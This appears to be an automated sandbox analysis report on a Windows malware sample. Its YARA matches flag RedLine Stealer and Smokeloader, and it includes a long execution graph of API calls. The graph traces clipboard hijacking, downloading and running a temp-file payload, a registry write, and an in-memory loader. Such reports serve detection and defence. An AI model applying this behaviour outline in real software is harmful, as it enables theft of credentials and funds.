                                                                          CF-RAY: 8ff2bda77d327c6a-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1935&min_rtt=1927&rtt_var=740&sent=12&recv=25&lost=0&retrans=0&sent_bytes=3057&recv_bytes=20929&delivery_rate=2194388&cwnd=219&unsent_bytes=0&cid=34ad72fa9a1c82b8&ts=635&x=0"
                                                                          2025-01-09 07:33:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                          Data Ascii: fok 8.46.123.189
                                                                          2025-01-09 07:33:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:02:33:29
                                                                          Start date:09/01/2025
                                                                          Path:C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Ljrprfl3BH.exe"
                                                                          Imagebase:0x400000
                                                                          File size:503'808 bytes
                                                                          MD5 hash:AB03119A9A5959898463FF872C49935D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:02:33:35
                                                                          Start date:09/01/2025
                                                                          Path:C:\Users\user\AppData\Local\Temp\BF85.tmp.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\BF85.tmp.exe"
                                                                          Imagebase:0x400000
                                                                          File size:341'504 bytes
                                                                          MD5 hash:D66791DB5C8D7BF392361E2343F7A5EA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2393295937.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:02:33:44
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1688
                                                                          Imagebase:0xd30000
                                                                          File size:483'680 bytes
                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:2.4%
                                                                            Dynamic/Decrypted Code Coverage:3.8%
                                                                            Signature Coverage:5.6%
                                                                            Total number of Nodes:766
                                                                            Total number of Limit Nodes:23
                                                                            execution_graph 64466 402ba3 RegCreateKeyExW 64467 402bd1 RegSetValueExW 64466->64467 64468 402be5 64466->64468 64467->64468 64469 402bf3 64468->64469 64470 402bea RegCloseKey 64468->64470 64470->64469 64471 404b84 64472 404b90 Concurrency::event::wait 64471->64472 64477 40fb02 64472->64477 64476 404bb0 Concurrency::details::platform::DefaultWaiterPool::~DefaultWaiterPool Concurrency::event::wait 64479 40fb07 64477->64479 64480 404b99 64479->64480 64482 40fb23 ListArray 64479->64482 64501 42ad6e 64479->64501 64508 42f440 7 API calls 2 library calls 64479->64508 64485 4051c6 64480->64485 64509 4285fd RaiseException 64482->64509 64484 4103bc 64486 4051d2 Concurrency::event::wait __Cnd_init 64485->64486 64489 4051ea __Mtx_init 64486->64489 64520 40ce28 28 API calls std::_Throw_Cpp_error 64486->64520 64488 405211 64512 4010ea 64488->64512 64489->64488 64521 40ce28 28 API calls std::_Throw_Cpp_error 64489->64521 64497 405260 64498 405275 Concurrency::details::platform::DefaultWaiterPool::~DefaultWaiterPool 64497->64498 64523 401128 30 API calls 2 library calls 64497->64523 64524 401109 64498->64524 64500 40529a Concurrency::event::wait 64500->64476 64506 433697 _Atexit 64501->64506 64502 4336d5 64511 42eab9 20 API calls _free 64502->64511 64503 4336c0 RtlAllocateHeap 64505 4336d3 64503->64505 64503->64506 64505->64479 64506->64502 64506->64503 64510 42f440 7 API calls 2 library calls 64506->64510 64508->64479 64509->64484 64510->64506 64511->64505 64528 40d309 64512->64528 64515 401103 64517 40cee9 64515->64517 64560 42e104 64517->64560 64520->64489 64521->64488 64522 40ce28 28 API calls std::_Throw_Cpp_error 64522->64497 64523->64497 64526 401115 __Mtx_unlock 64524->64526 64525 401122 64525->64500 64526->64525 64895 40ce28 28 API calls std::_Throw_Cpp_error 64526->64895 64532 40d063 64528->64532 64531 40ce28 28 API calls std::_Throw_Cpp_error 64531->64515 64533 40d0b9 64532->64533 64534 40d08b GetCurrentThreadId 64532->64534 64536 40d0bd GetCurrentThreadId 64533->64536 64540 40d0e3 64533->64540 64535 40d096 GetCurrentThreadId 64534->64535 64546 40d0b1 64534->64546 64535->64546 64545 40d0cc 64536->64545 64537 40d17c GetCurrentThreadId 64537->64545 64538 40d1d3 GetCurrentThreadId 64538->64546 64539 40d103 64557 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64539->64557 64540->64537 64540->64539 64544 4010f6 64544->64515 64544->64531 64545->64538 64545->64546 64550 40f8c5 64546->64550 64547 40d13b GetCurrentThreadId 64547->64545 64548 40d10e __Xtime_diff_to_millis2 64547->64548 64548->64545 64548->64546 64548->64547 64558 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64548->64558 64551 40f8d0 IsProcessorFeaturePresent 64550->64551 64552 40f8ce 64550->64552 64554 40f943 64551->64554 64552->64544 64559 40f907 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64554->64559 64556 40fa26 64556->64544 64557->64548 64558->64548 64559->64556 64561 42e111 64560->64561 64562 42e125 64560->64562 64583 42eab9 20 API calls _free 64561->64583 64574 42e0bb 64562->64574 64566 42e116 64584 42a58d 26 API calls _Deallocate 64566->64584 64567 42e13a CreateThread 64569 42e165 64567->64569 64570 42e159 GetLastError 64567->64570 64612 42dfb0 64567->64612 64586 42e02d 64569->64586 64585 42ea83 20 API calls 2 library calls 64570->64585 64571 40524d 64571->64497 64571->64522 64594 434d1a 64574->64594 64578 42e0d4 64579 42e0f3 64578->64579 64580 42e0db GetModuleHandleExW 64578->64580 64581 42e02d __Thrd_start 22 API calls 64579->64581 64580->64579 64582 42e0fd 64581->64582 64582->64567 64582->64569 64583->64566 64584->64571 64585->64569 64587 42e03a 64586->64587 64588 42e05e 64586->64588 64589 42e040 CloseHandle 64587->64589 64590 42e049 64587->64590 64588->64571 64589->64590 64591 42e058 64590->64591 64592 42e04f FreeLibrary 64590->64592 64593 43345a _free 20 API calls 64591->64593 64592->64591 64593->64588 64595 434d27 64594->64595 64596 434d67 64595->64596 64597 434d52 HeapAlloc 64595->64597 64600 434d3b _Atexit 64595->64600 64610 42eab9 20 API calls _free 64596->64610 64598 434d65 64597->64598 64597->64600 64601 42e0cb 64598->64601 64600->64596 64600->64597 64609 42f440 7 API calls 2 library calls 64600->64609 64603 43345a 64601->64603 64604 433465 RtlFreeHeap 64603->64604 64608 43348e _free 64603->64608 64605 43347a 64604->64605 64604->64608 64611 42eab9 20 API calls _free 64605->64611 64607 433480 GetLastError 64607->64608 64608->64578 64609->64600 64610->64601 64611->64607 64613 42dfbc _Atexit 64612->64613 64614 42dfc3 GetLastError ExitThread 64613->64614 64615 42dfd0 64613->64615 64628 431eca GetLastError 64615->64628 64617 42dfd5 64648 435561 64617->64648 64619 42dfeb 64655 401169 64619->64655 64629 431ee0 64628->64629 64630 431ee6 64628->64630 64663 435101 11 API calls 2 library calls 64629->64663 64632 434d1a _Atexit 20 API calls 64630->64632 64634 431f35 SetLastError 64630->64634 64633 431ef8 64632->64633 64639 431f00 64633->64639 64664 435157 11 API calls 2 library calls 64633->64664 64634->64617 64636 43345a _free 20 API calls 64638 431f06 64636->64638 64637 431f15 64637->64639 64640 431f1c 64637->64640 64641 431f41 SetLastError 64638->64641 64639->64636 64665 431d3c 20 API calls _Atexit 64640->64665 64666 42df6d 167 API calls _Atexit 64641->64666 64643 431f27 64645 43345a _free 20 API calls 64643->64645 64647 431f2e 64645->64647 64646 431f4d 64647->64634 64647->64641 64649 435586 64648->64649 64650 43557c 64648->64650 64667 434e83 5 API calls 2 library calls 64649->64667 64652 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64650->64652 64653 42dfe0 64652->64653 64653->64619 64662 435494 10 API calls 2 library calls 64653->64662 64654 43559d 64654->64650 64668 4057f6 64655->64668 64681 40155a Sleep 64655->64681 64656 401173 64659 42e189 64656->64659 64863 42e064 64659->64863 64661 42e196 64662->64619 64663->64630 64664->64637 64665->64643 64666->64646 64667->64654 64669 405802 Concurrency::event::wait 64668->64669 64670 4010ea std::_Cnd_initX 35 API calls 64669->64670 64671 405817 __Cnd_signal 64670->64671 64674 40582f 64671->64674 64727 40ce28 28 API calls std::_Throw_Cpp_error 64671->64727 64673 401109 std::_Cnd_initX 28 API calls 64675 405838 64673->64675 64674->64673 64683 4016df 64675->64683 64704 4029ea InternetOpenW 64675->64704 64678 40583f Concurrency::details::platform::DefaultWaiterPool::~DefaultWaiterPool Concurrency::event::wait 64678->64656 64682 4016d5 64681->64682 64728 40fddc 64683->64728 64685 4016eb Sleep 64729 40cc06 64685->64729 64688 40cc06 28 API calls 64689 401711 64688->64689 64690 40171b OpenClipboard 64689->64690 64691 401943 Sleep 64690->64691 64692 40172b GetClipboardData 64690->64692 64691->64690 64693 40173b GlobalLock 64692->64693 64694 40193d CloseClipboard 64692->64694 64693->64694 64696 401748 _strlen 64693->64696 64694->64691 64695 40cbbd 28 API calls std::system_error::system_error 64695->64696 64696->64694 64696->64695 64697 40cc06 28 API calls 64696->64697 64699 4018d2 EmptyClipboard GlobalAlloc 64696->64699 64733 402e5c 167 API calls 2 library calls 64696->64733 64735 40ca9c 26 API calls _Deallocate 64696->64735 64697->64696 64699->64696 64701 4018eb GlobalLock 64699->64701 64734 426980 64701->64734 64703 401905 GlobalUnlock SetClipboardData GlobalFree 64703->64696 64705 402a1d InternetOpenUrlW 64704->64705 64707 402b92 64704->64707 64706 402a33 GetTempPathW GetTempFileNameW 64705->64706 64705->64707 64741 42a87e 64706->64741 64709 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64707->64709 64711 402ba1 64709->64711 64720 40e761 64711->64720 64712 402b81 InternetCloseHandle InternetCloseHandle 64712->64707 64713 402a9e __Getcvt 64714 402ab6 InternetReadFile WriteFile 64713->64714 64715 402af6 CloseHandle 64713->64715 64714->64713 64743 402956 64715->64743 64718 402b21 ShellExecuteExW 64718->64712 64719 402b68 WaitForSingleObject CloseHandle 64718->64719 64719->64712 64854 40dee0 64720->64854 64725 40e806 64725->64678 64726 40e778 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64861 40deec LeaveCriticalSection std::_Lockit::~_Lockit 64726->64861 64727->64674 64728->64685 64730 40cc22 _strlen 64729->64730 64736 40cbbd 64730->64736 64732 401704 64732->64688 64733->64696 64734->64703 64735->64696 64737 40cbf0 64736->64737 64739 40cbcc BuildCatchObjectHelperInternal 64736->64739 64737->64739 64740 40cb52 28 API calls 4 library calls 64737->64740 64739->64732 64740->64739 64742 402a6c CreateFileW 64741->64742 64742->64712 64742->64713 64744 402981 __Getcvt _wcslen 64743->64744 64753 42b444 64744->64753 64748 4029ae 64775 404329 64748->64775 64751 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64752 4029e8 64751->64752 64752->64712 64752->64718 64779 42b0f6 64753->64779 64756 402819 64757 402828 Concurrency::event::wait 64756->64757 64805 4032d3 64757->64805 64759 40283c 64821 403b81 64759->64821 64761 402850 64762 402862 64761->64762 64763 40287e 64761->64763 64848 403290 167 API calls 64762->64848 64827 403108 64763->64827 64766 40288b 64830 403c16 64766->64830 64768 40289d 64840 403cb8 64768->64840 64770 4028ba 64772 404329 26 API calls 64770->64772 64771 402875 std::ios_base::_Ios_base_dtor Concurrency::event::wait 64771->64748 64773 4028d9 64772->64773 64849 403290 167 API calls 64773->64849 64776 404331 64775->64776 64777 4029da 64775->64777 64850 40cc8c 64776->64850 64777->64751 64780 42b123 64779->64780 64781 42b127 64780->64781 64782 42b132 64780->64782 64783 42b14a 64780->64783 64787 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64781->64787 64785 42eab9 _free 20 API calls 64782->64785 64784 42a737 __fassign 162 API calls 64783->64784 64786 42b155 64784->64786 64788 42b137 64785->64788 64789 42b160 64786->64789 64790 42b2f7 64786->64790 64791 40299a 64787->64791 64792 42a58d __Thrd_start 26 API calls 64788->64792 64795 42b208 WideCharToMultiByte 64789->64795 64799 42b16b 64789->64799 64802 42b1a5 WideCharToMultiByte 64789->64802 64793 42b324 WideCharToMultiByte 64790->64793 64794 42b302 64790->64794 64791->64756 64792->64781 64793->64794 64794->64781 64796 42eab9 _free 20 API calls 64794->64796 64797 42b233 64795->64797 64795->64799 64796->64781 64797->64799 64800 42b23c GetLastError 64797->64800 64799->64781 64801 42eab9 _free 20 API calls 64799->64801 64800->64799 64804 42b24b 64800->64804 64801->64781 64802->64799 64803 42b264 WideCharToMultiByte 64803->64794 64803->64804 64804->64781 64804->64794 64804->64803 64806 4032df Concurrency::event::wait 64805->64806 64807 404672 167 API calls 64806->64807 64808 40330b 64807->64808 64809 404843 167 API calls 64808->64809 64810 403334 64809->64810 64811 404582 26 API calls 64810->64811 64812 403343 64811->64812 64813 403388 std::ios_base::_Ios_base_dtor 64812->64813 64814 40ddd9 167 API calls 64812->64814 64815 4033c4 Concurrency::event::wait 64813->64815 64817 40c60e 167 API calls 64813->64817 64816 403358 64814->64816 64815->64759 64816->64813 64818 404582 26 API calls 64816->64818 64817->64815 64819 403369 64818->64819 64820 404c0a 167 API calls 64819->64820 64820->64813 64822 403b8d Concurrency::event::wait 64821->64822 64823 4042a5 167 API calls 64822->64823 64824 403b99 64823->64824 64825 403bbd Concurrency::event::wait 64824->64825 64826 4034f1 167 API calls 64824->64826 64825->64761 64826->64825 64828 40434c 28 API calls 64827->64828 64829 403122 __Getcvt 64828->64829 64829->64766 64831 403c22 Concurrency::event::wait 64830->64831 64832 40c60e 167 API calls 64831->64832 64833 403c45 64832->64833 64834 4042a5 167 API calls 64833->64834 64835 403c4f 64834->64835 64837 403c92 Concurrency::event::wait 64835->64837 64839 4034f1 167 API calls 64835->64839 64836 403c70 64836->64837 64838 4046c0 167 API calls 64836->64838 64837->64768 64838->64837 64839->64836 64841 403cc4 __EH_prolog3_catch 64840->64841 64842 4042a5 167 API calls 64841->64842 64844 403cdd 64842->64844 64843 4046c0 167 API calls 64846 403d66 Concurrency::event::wait 64843->64846 64845 403d0d 64844->64845 64847 403695 40 API calls 64844->64847 64845->64843 64846->64770 64847->64845 64848->64771 64849->64771 64851 40cc99 64850->64851 64852 40cca6 Concurrency::details::platform::DefaultWaiterPool::~DefaultWaiterPool 64850->64852 64853 40cc68 _Deallocate 26 API calls 64851->64853 64852->64777 64853->64852 64862 40f220 EnterCriticalSection 64854->64862 64856 40deea 64857 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64856->64857 64858 40cec8 64857->64858 64859 40cebd CloseHandle 64857->64859 64860 40cecc GetCurrentThreadId 64858->64860 64859->64860 64860->64726 64861->64725 64862->64856 64872 431f4e GetLastError 64863->64872 64865 42e073 ExitThread 64868 42e091 64869 42e09d CloseHandle 64868->64869 64870 42e0a4 64868->64870 64869->64870 64870->64865 64871 42e0b0 FreeLibraryAndExitThread 64870->64871 64873 431f6d 64872->64873 64874 431f67 64872->64874 64876 434d1a _Atexit 17 API calls 64873->64876 64878 431fc4 SetLastError 64873->64878 64892 435101 11 API calls 2 library calls 64874->64892 64877 431f7f 64876->64877 64881 431f87 64877->64881 64893 435157 11 API calls 2 library calls 64877->64893 64880 42e06f 64878->64880 64880->64865 64880->64868 64891 4354e6 10 API calls 2 library calls 64880->64891 64882 43345a _free 17 API calls 64881->64882 64884 431f8d 64882->64884 64883 431f9c 64883->64881 64885 431fa3 64883->64885 64886 431fbb SetLastError 64884->64886 64894 431d3c 20 API calls _Atexit 64885->64894 64886->64880 64888 431fae 64889 43345a _free 17 API calls 64888->64889 64890 431fb4 64889->64890 64890->64878 64890->64886 64891->64868 64892->64873 64893->64883 64894->64888 64895->64525 64896 402394 64897 402557 PostQuitMessage 64896->64897 64898 4023a8 64896->64898 64899 402555 64897->64899 64900 4023af DefWindowProcW 64898->64900 64901 4023c6 64898->64901 64900->64899 64901->64899 64902 4029ea 167 API calls 64901->64902 64902->64899 64903 219003c 64904 2190049 64903->64904 64918 2190e0f SetErrorMode SetErrorMode 64904->64918 64909 2190265 64910 21902ce VirtualProtect 64909->64910 64912 219030b 64910->64912 64911 2190439 VirtualFree 64916 21904be 64911->64916 64917 21905f4 LoadLibraryA 64911->64917 64912->64911 64913 21904e3 LoadLibraryA 64913->64916 64915 21908c7 64916->64913 64916->64917 64917->64915 64919 2190223 64918->64919 64920 2190d90 64919->64920 64921 2190dad 64920->64921 64922 2190dbb GetPEB 64921->64922 64923 2190238 VirtualAlloc 64921->64923 64922->64923 64923->64909 64924 432775 64929 432543 64924->64929 64927 43279d 64930 43256e 64929->64930 64940 4326b7 64930->64940 64944 43c8be 170 API calls 2 library calls 64930->64944 64932 432761 64948 42a58d 26 API calls _Deallocate 64932->64948 64934 4326c0 64934->64927 64941 43d00c 64934->64941 64936 432701 64936->64940 64945 43c8be 170 API calls 2 library calls 64936->64945 64938 432720 64938->64940 64946 43c8be 170 API calls 2 library calls 64938->64946 64940->64934 64947 42eab9 20 API calls _free 64940->64947 64949 43c9e1 64941->64949 64943 43d027 64943->64927 64944->64936 64945->64938 64946->64940 64947->64932 64948->64934 64951 43c9ed ___DestructExceptionObject 64949->64951 64950 43c9fb 64967 42eab9 20 API calls _free 64950->64967 64951->64950 64953 43ca34 64951->64953 64960 43cfbb 64953->64960 64954 43ca00 64968 42a58d 26 API calls _Deallocate 64954->64968 64959 43ca0a __fread_nolock 64959->64943 64970 43f931 64960->64970 64965 43345a _free 20 API calls 64966 43ca58 64965->64966 64969 43ca81 LeaveCriticalSection __wsopen_s 64966->64969 64967->64954 64968->64959 64969->64959 64971 43f954 64970->64971 64972 43f93d 64970->64972 64974 43f973 64971->64974 64975 43f95c 64971->64975 65041 42eab9 20 API calls _free 64972->65041 65045 434f9a 10 API calls 2 library calls 64974->65045 65043 42eab9 20 API calls _free 64975->65043 64977 43f942 65042 42a58d 26 API calls _Deallocate 64977->65042 64979 43f97a MultiByteToWideChar 64982 43f9a9 64979->64982 64983 43f999 GetLastError 64979->64983 64981 43f961 65044 42a58d 26 API calls _Deallocate 64981->65044 65047 433697 21 API calls 3 library calls 64982->65047 65046 42ea83 20 API calls 2 library calls 64983->65046 64987 43cfd1 64987->64966 64994 43d02c 64987->64994 64988 43f9b1 64989 43f9b8 MultiByteToWideChar 64988->64989 64993 43f9d9 64988->64993 64991 43f9cd GetLastError 64989->64991 64989->64993 64990 43345a _free 20 API calls 64990->64987 65048 42ea83 20 API calls 2 library calls 64991->65048 64993->64990 65049 43cd8f 64994->65049 64997 43d077 65067 43976e 64997->65067 64998 43d05e 65081 42eaa6 20 API calls _free 64998->65081 65001 43d063 65082 42eab9 20 API calls _free 65001->65082 65002 43d07c 65003 43d085 65002->65003 65004 43d09c 65002->65004 65083 42eaa6 20 API calls _free 65003->65083 65080 43ccfa CreateFileW 65004->65080 65008 43d08a 65084 42eab9 20 API calls _free 65008->65084 65009 43d152 GetFileType 65012 43d1a4 65009->65012 65013 43d15d GetLastError 65009->65013 65011 43d127 GetLastError 65086 42ea83 20 API calls 2 library calls 65011->65086 65089 4396b7 21 API calls 3 library calls 65012->65089 65087 42ea83 20 API calls 2 library calls 65013->65087 65014 43d0d5 65014->65009 65014->65011 65085 43ccfa CreateFileW 65014->65085 65018 43d16b CloseHandle 65018->65001 65021 43d194 65018->65021 65020 43d11a 65020->65009 65020->65011 65088 42eab9 20 API calls _free 65021->65088 65022 43d1c5 65024 43d211 65022->65024 65090 43cf0b 169 API calls 4 library calls 65022->65090 65029 43d23e 65024->65029 65091 43caad 167 API calls 4 library calls 65024->65091 65025 43d199 65025->65001 65028 43d237 65028->65029 65030 43d24f 65028->65030 65092 4335bd 29 API calls 2 library calls 65029->65092 65032 43cff9 65030->65032 65033 43d2cd CloseHandle 65030->65033 65032->64965 65093 43ccfa CreateFileW 65033->65093 65035 43d2f8 65036 43d302 GetLastError 65035->65036 65040 43d247 65035->65040 65094 42ea83 20 API calls 2 library calls 65036->65094 65038 43d30e 65095 439880 21 API calls 3 library calls 65038->65095 65040->65032 65041->64977 65042->64987 65043->64981 65044->64987 65045->64979 65046->64987 65047->64988 65048->64993 65050 43cdb0 65049->65050 65051 43cdca 65049->65051 65050->65051 65103 42eab9 20 API calls _free 65050->65103 65096 43cd1f 65051->65096 65053 43ce02 65057 43ce31 65053->65057 65105 42eab9 20 API calls _free 65053->65105 65055 43cdbf 65104 42a58d 26 API calls _Deallocate 65055->65104 65064 43ce84 65057->65064 65107 42ffcf 26 API calls 2 library calls 65057->65107 65060 43ce7f 65062 43cefe 65060->65062 65060->65064 65061 43ce26 65106 42a58d 26 API calls _Deallocate 65061->65106 65108 42a5ba 11 API calls _Atexit 65062->65108 65064->64997 65064->64998 65066 43cf0a 65068 43977a ___DestructExceptionObject 65067->65068 65111 42e3dd EnterCriticalSection 65068->65111 65070 4397a6 65115 43954d 21 API calls 3 library calls 65070->65115 65073 4397f1 __fread_nolock 65073->65002 65074 439781 65074->65070 65076 439814 EnterCriticalSection 65074->65076 65077 4397c8 65074->65077 65075 4397ab 65075->65077 65116 439694 EnterCriticalSection 65075->65116 65076->65077 65078 439821 LeaveCriticalSection 65076->65078 65112 439877 65077->65112 65078->65074 65080->65014 65081->65001 65082->65032 65083->65008 65084->65001 65085->65020 65086->65001 65087->65018 65088->65025 65089->65022 65090->65024 65091->65028 65092->65040 65093->65035 65094->65038 65095->65040 65098 43cd37 65096->65098 65097 43cd52 65097->65053 65098->65097 65109 42eab9 20 API calls _free 65098->65109 65100 43cd76 65110 42a58d 26 API calls _Deallocate 65100->65110 65102 43cd81 65102->65053 65103->65055 65104->65051 65105->65061 65106->65057 65107->65060 65108->65066 65109->65100 65110->65102 65111->65074 65117 42e425 LeaveCriticalSection 65112->65117 65114 43987e 65114->65073 65115->65075 65116->65077 65117->65114 65118 4340fa 65119 434106 ___DestructExceptionObject 65118->65119 65120 434112 65119->65120 65121 434129 65119->65121 65152 42eab9 20 API calls _free 65120->65152 65131 42caef EnterCriticalSection 65121->65131 65124 434139 65132 434176 65124->65132 65125 434117 65153 42a58d 26 API calls _Deallocate 65125->65153 65128 434145 65154 43416c LeaveCriticalSection __fread_nolock 65128->65154 65129 434122 __fread_nolock 65131->65124 65133 434184 65132->65133 65134 43419e 65132->65134 65165 42eab9 20 API calls _free 65133->65165 65155 4328f8 65134->65155 65137 434189 65166 42a58d 26 API calls _Deallocate 65137->65166 65138 4341a7 65162 4347c3 65138->65162 65142 4342ab 65144 4342b8 65142->65144 65148 43425e 65142->65148 65143 43422f 65146 43424c 65143->65146 65143->65148 65168 42eab9 20 API calls _free 65144->65168 65167 43448f 31 API calls 4 library calls 65146->65167 65149 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65148->65149 65169 43430b 30 API calls 2 library calls 65148->65169 65149->65128 65150 434256 65150->65149 65152->65125 65153->65129 65154->65129 65156 432904 65155->65156 65157 432919 65155->65157 65170 42eab9 20 API calls _free 65156->65170 65157->65138 65159 432909 65171 42a58d 26 API calls _Deallocate 65159->65171 65161 432914 65161->65138 65172 434640 65162->65172 65164 4341c3 65164->65142 65164->65143 65164->65149 65165->65137 65166->65149 65167->65150 65168->65149 65169->65149 65170->65159 65171->65161 65173 43464c ___DestructExceptionObject 65172->65173 65174 434654 65173->65174 65177 43466c 65173->65177 65207 42eaa6 20 API calls _free 65174->65207 65176 434720 65212 42eaa6 20 API calls _free 65176->65212 65177->65176 65181 4346a4 65177->65181 65178 434659 65208 42eab9 20 API calls _free 65178->65208 65180 434725 65213 42eab9 20 API calls _free 65180->65213 65197 439694 EnterCriticalSection 65181->65197 65185 43472d 65214 42a58d 26 API calls _Deallocate 65185->65214 65186 4346aa 65188 4346e3 65186->65188 65189 4346ce 65186->65189 65198 434745 65188->65198 65209 42eab9 20 API calls _free 65189->65209 65191 434661 __fread_nolock 65191->65164 65193 4346d3 65210 42eaa6 20 API calls _free 65193->65210 65194 4346de 65211 434718 LeaveCriticalSection __wsopen_s 65194->65211 65197->65186 65215 439911 65198->65215 65200 434757 65201 434770 SetFilePointerEx 65200->65201 65202 43475f 65200->65202 65204 434788 GetLastError 65201->65204 65205 434764 65201->65205 65228 42eab9 20 API calls _free 65202->65228 65229 42ea83 20 API calls 2 library calls 65204->65229 65205->65194 65207->65178 65208->65191 65209->65193 65210->65194 65211->65191 65212->65180 65213->65185 65214->65191 65216 439933 65215->65216 65217 43991e 65215->65217 65222 439958 65216->65222 65232 42eaa6 20 API calls _free 65216->65232 65230 42eaa6 20 API calls _free 65217->65230 65219 439923 65231 42eab9 20 API calls _free 65219->65231 65222->65200 65223 439963 65233 42eab9 20 API calls _free 65223->65233 65224 43992b 65224->65200 65226 43996b 65234 42a58d 26 API calls _Deallocate 65226->65234 65228->65205 65229->65205 65230->65219 65231->65224 65232->65223 65233->65226 65234->65224 65235 402bfa InternetOpenW 65236 402e4b 65235->65236 65239 402c2d __Getcvt 65235->65239 65237 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65236->65237 65238 402e5a 65237->65238 65247 42deed 65239->65247 65242 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65243 402e0d 65242->65243 65244 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65243->65244 65245 402e1f InternetOpenUrlW 65244->65245 65245->65236 65246 402e3a InternetCloseHandle InternetCloseHandle 65245->65246 65246->65236 65248 42df0a 65247->65248 65250 42defc 65247->65250 65256 42eab9 20 API calls _free 65248->65256 65250->65248 65253 42df3a 65250->65253 65252 402dff 65252->65242 65253->65252 65258 42eab9 20 API calls _free 65253->65258 65255 42df14 65257 42a58d 26 API calls _Deallocate 65255->65257 65256->65255 65257->65252 65258->65255 65259 40fbfc 65260 40fc08 ___DestructExceptionObject 65259->65260 65288 40ffe9 65260->65288 65262 40fc0f 65263 40fd62 65262->65263 65266 40fc39 65262->65266 65309 4104c3 4 API calls 2 library calls 65263->65309 65265 40fd69 65310 42ffb9 28 API calls _Atexit 65265->65310 65273 40fc78 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65266->65273 65303 42fcde 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65266->65303 65268 40fd6f 65311 42ff6b 28 API calls _Atexit 65268->65311 65271 40fc52 65274 40fc58 65271->65274 65304 42fc82 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65271->65304 65272 40fd77 65276 40fcd9 65273->65276 65305 42a356 167 API calls 3 library calls 65273->65305 65299 4105dd 65276->65299 65279 40fcdf 65280 40fcf4 65279->65280 65306 410613 GetModuleHandleW 65280->65306 65282 40fcfb 65282->65265 65283 40fcff 65282->65283 65284 40fd08 65283->65284 65307 42ff5c 28 API calls _Atexit 65283->65307 65308 410178 13 API calls 2 library calls 65284->65308 65287 40fd10 65287->65274 65289 40fff2 65288->65289 65312 41076b IsProcessorFeaturePresent 65289->65312 65291 40fffe 65313 428817 10 API calls 3 library calls 65291->65313 65293 410003 65294 410007 65293->65294 65314 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65293->65314 65294->65262 65296 410010 65297 41001e 65296->65297 65315 428840 8 API calls 3 library calls 65296->65315 65297->65262 65316 426820 65299->65316 65301 4105f0 GetStartupInfoW 65302 410603 65301->65302 65302->65279 65303->65271 65304->65273 65305->65276 65306->65282 65307->65284 65308->65287 65309->65265 65310->65268 65311->65272 65312->65291 65313->65293 65314->65296 65315->65294 65317 426837 65316->65317 65317->65301 65317->65317 65318 4332ce 65319 4332f3 65318->65319 65320 4332db 65318->65320 65324 43334e 65319->65324 65332 4332eb 65319->65332 65370 434cbd 21 API calls 2 library calls 65319->65370 65368 42eab9 20 API calls _free 65320->65368 